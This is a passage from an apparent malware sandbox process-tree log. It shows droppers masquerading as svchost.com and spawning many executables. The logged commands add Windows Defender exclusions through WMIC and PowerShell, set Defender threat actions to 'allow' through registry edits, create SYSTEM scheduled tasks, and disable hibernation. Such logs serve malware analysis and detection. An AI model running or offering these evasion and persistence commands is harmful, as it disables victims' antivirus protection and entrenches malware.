        .\Install.exe /KdidajMd "385118" /S
        7⤵
        
        PID:7672
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        8⤵
        
        PID:5800
        
        C:\Windows\SysWOW64\forfiles.exe
        
        C:\Windows\System32\forfiles.exe /p c:\windows\system32 /m where.exe /c cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        
        PID:5848
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bvsYAGfGVfhExjZmnp" /SC once /ST 08:49:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\vjcpGsL.exe\" my /nWsite_idPdk 385118 /S" /V1 /F
        8⤵
        Creates scheduled task(s)
        
        PID:5856
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "bvsYAGfGVfhExjZmnp"
        8⤵
        
        PID:2228
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\EPACUG~1.EXE"
        5⤵
        
        PID:960
      - C:\Users\Admin\Pictures\EPACUG~1.EXE
        
        C:\Users\Admin\Pictures\EPACUG~1.EXE
        6⤵
        
        PID:2916
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:7276
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\SHB0YL~1.EXE"
        5⤵
        
        PID:6360
      - C:\Users\Admin\Pictures\SHB0YL~1.EXE
        
        C:\Users\Admin\Pictures\SHB0YL~1.EXE
        6⤵
        
        PID:448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:1808
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\6BZUMG~1.EXE"
        5⤵
        
        PID:3644
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\G3WOFF~1.EXE" --silent --allusers=0
        5⤵
        
        PID:5400
      - C:\Users\Admin\Pictures\G3WOFF~1.EXE
        
        C:\Users\Admin\Pictures\G3WOFF~1.EXE --silent --allusers=0
        6⤵
        
        PID:6808
        
        C:\Users\Admin\Pictures\G3WOFF~1.EXE
        
        C:\Users\Admin\Pictures\G3WOFF~1.EXE --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x298,0x29c,0x2a0,0x258,0x2a4,0x6518e1d0,0x6518e1dc,0x6518e1e8
        7⤵
        
        PID:6704
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\G3WOFF~1.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\G3WOFF~1.EXE" --version
        7⤵
        
        PID:8112
        
        C:\Users\Admin\Pictures\G3WOFF~1.EXE
        
        "C:\Users\Admin\Pictures\G3WOFF~1.EXE" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=6808 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240410084714" --session-guid=cdc2f252-54db-4aec-8f65-90699a8961ee --server-tracking-blob="YmU4MmJkNzg4ZWExZmRjMTMwOTU5OWViODBmMTA1NTg5NjdjOTdhYjdlZWM4YWRmNDFiN2ViMzViM2U3NzQ1Zjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fMTIzIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEyNzM4ODExLjcyNjMiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzEyMyIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiMWVlYWU0NjEtZjg5ZS00ZTQ5LTk0ZTYtZGRiMjc4ODQ3NGIyIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=F004000000000000
        7⤵
        
        PID:7792
        
        C:\Users\Admin\Pictures\G3WOFF~1.EXE
        
        C:\Users\Admin\Pictures\G3WOFF~1.EXE --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6480e1d0,0x6480e1dc,0x6480e1e8
        8⤵
        
        PID:5756
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404100847141\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404100847141\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
        7⤵
        
        PID:4104
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\RZ680B~1.EXE"
        5⤵
        
        PID:1860
      - C:\Users\Admin\Pictures\RZ680B~1.EXE
        
        C:\Users\Admin\Pictures\RZ680B~1.EXE
        6⤵
        
        PID:4828
        
        C:\Users\Admin\AppData\Local\Temp\7zS61EE.tmp\Install.exe
        
        .\Install.exe /KdidajMd "385118" /S
        7⤵
        
        PID:6332
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        8⤵
        
        PID:4684
        
        C:\Windows\SysWOW64\forfiles.exe
        
        C:\Windows\System32\forfiles.exe /p c:\windows\system32 /m where.exe /c cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        
        PID:3836
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bvsYAGfGVfhExjZmnp" /SC once /ST 08:49:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\JaJmQbp.exe\" my /RIsite_idiUL 385118 /S" /V1 /F
        8⤵
        Creates scheduled task(s)
        
        PID:5624
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "bvsYAGfGVfhExjZmnp"
        8⤵
        
        PID:2076
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\TCTWWX~1.EXE"
        5⤵
        
        PID:5592
      - C:\Users\Admin\Pictures\TCTWWX~1.EXE
        
        C:\Users\Admin\Pictures\TCTWWX~1.EXE
        6⤵
        
        PID:5936
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\CO180R~1.EXE"
        5⤵
        
        PID:4552
      - C:\Users\Admin\Pictures\CO180R~1.EXE
        
        C:\Users\Admin\Pictures\CO180R~1.EXE
        6⤵
        
        PID:1620
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\VPJKZ9~1.EXE"
        5⤵
        
        PID:3752
      - C:\Users\Admin\Pictures\VPJKZ9~1.EXE
        
        C:\Users\Admin\Pictures\VPJKZ9~1.EXE
        6⤵
        
        PID:5136
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\RNAQFQ~1.EXE"
        5⤵
        
        PID:4580
      - C:\Users\Admin\Pictures\RNAQFQ~1.EXE
        
        C:\Users\Admin\Pictures\RNAQFQ~1.EXE
        6⤵
        
        PID:3996
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\OGCUQ0~1.EXE"
        5⤵
        
        PID:536
      - C:\Users\Admin\Pictures\OGCUQ0~1.EXE
        
        C:\Users\Admin\Pictures\OGCUQ0~1.EXE
        6⤵
        
        PID:7580
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\VCYJO9~1.EXE"
        5⤵
        
        PID:3168
      - C:\Users\Admin\Pictures\VCYJO9~1.EXE
        
        C:\Users\Admin\Pictures\VCYJO9~1.EXE
        6⤵
        
        PID:1320
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\SJGYA7~1.EXE" --silent --allusers=0
        5⤵
        
        PID:3036
      - C:\Users\Admin\Pictures\SJGYA7~1.EXE
        
        C:\Users\Admin\Pictures\SJGYA7~1.EXE --silent --allusers=0
        6⤵
        
        PID:3428
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\LGANQ7~1.EXE"
        5⤵
        
        PID:3276
      - C:\Users\Admin\Pictures\LGANQ7~1.EXE
        
        C:\Users\Admin\Pictures\LGANQ7~1.EXE
        6⤵
        
        PID:7316
    - - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\U2CJDI~1.EXE"
        5⤵
        
        PID:4208
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
      4⤵
      PID:7296
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100110~1\jok.exe"
  2⤵
  PID:6552
- - C:\Users\Admin\AppData\Local\Temp\100110~1\jok.exe
    C:\Users\Admin\AppData\Local\Temp\100110~1\jok.exe
    3⤵
    PID:7864
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100110~2\swiiii.exe"
  2⤵
  PID:3568
- - C:\Users\Admin\AppData\Local\Temp\100110~2\swiiii.exe
    C:\Users\Admin\AppData\Local\Temp\100110~2\swiiii.exe
    3⤵
    PID:6584
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:4460

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:2004

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=6092 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8
1⤵
PID:5512

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
PID:7420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x23c,0x240,0x244,0x238,0x2f0,0x7ff980c42e98,0x7ff980c42ea4,0x7ff980c42eb0
  2⤵
  PID:4840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2592 --field-trial-handle=2596,i,10599791354717097603,6136038765806717552,262144 --variations-seed-version /prefetch:2
  2⤵
  PID:3328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3064 --field-trial-handle=2596,i,10599791354717097603,6136038765806717552,262144 --variations-seed-version /prefetch:3
  2⤵
  PID:7816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3144 --field-trial-handle=2596,i,10599791354717097603,6136038765806717552,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:4356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4468 --field-trial-handle=2596,i,10599791354717097603,6136038765806717552,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:8036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4512 --field-trial-handle=2596,i,10599791354717097603,6136038765806717552,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:6104
- C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4572 --field-trial-handle=2596,i,10599791354717097603,6136038765806717552,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:7464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=3508 --field-trial-handle=2596,i,10599791354717097603,6136038765806717552,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:5108
- C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4572 --field-trial-handle=2596,i,10599791354717097603,6136038765806717552,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:6900
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3152 --field-trial-handle=2596,i,10599791354717097603,6136038765806717552,262144 --variations-seed-version /prefetch:3
  2⤵
  PID:1732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4340 --field-trial-handle=2596,i,10599791354717097603,6136038765806717552,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:1232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4208 -ip 4208
1⤵
PID:5640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2224 -ip 2224
1⤵
PID:5212

C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
1⤵
PID:384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1184 -ip 1184
1⤵
PID:924

C:\ProgramData\trmrjvadsnmf\whrbuflqwhah.exe
C:\ProgramData\trmrjvadsnmf\whrbuflqwhah.exe
1⤵
PID:3744
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  PID:6956

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\IDENTI~1.EXE" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4572 --field-trial-handle=2596,i,10599791354717097603,6136038765806717552,262144 --variations-seed-version /prefetch:8
1⤵
PID:1880
- C:\Users\Admin\AppData\Local\Temp\3582-490\IDENTI~1.EXE
  C:\Users\Admin\AppData\Local\Temp\3582-490\IDENTI~1.EXE --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4572 --field-trial-handle=2596,i,10599791354717097603,6136038765806717552,262144 --variations-seed-version /prefetch:8
  2⤵
  PID:7852

C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
1⤵
PID:6356

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:7928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:7316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:6124

C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
1⤵
PID:6008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 6740 -ip 6740
1⤵
PID:6960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4596 -ip 4596
1⤵
PID:4484

C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\vjcpGsL.exe
C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\vjcpGsL.exe my /nWsite_idPdk 385118 /S
1⤵
PID:5332
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:8124
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4820
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:6584
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4000
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2740
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6460
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:288
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2236
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6884
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3620
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4320
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7440

C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
1⤵
PID:3412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2656 -ip 2656
1⤵
PID:3764

C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe
1⤵
PID:5548
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:296
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
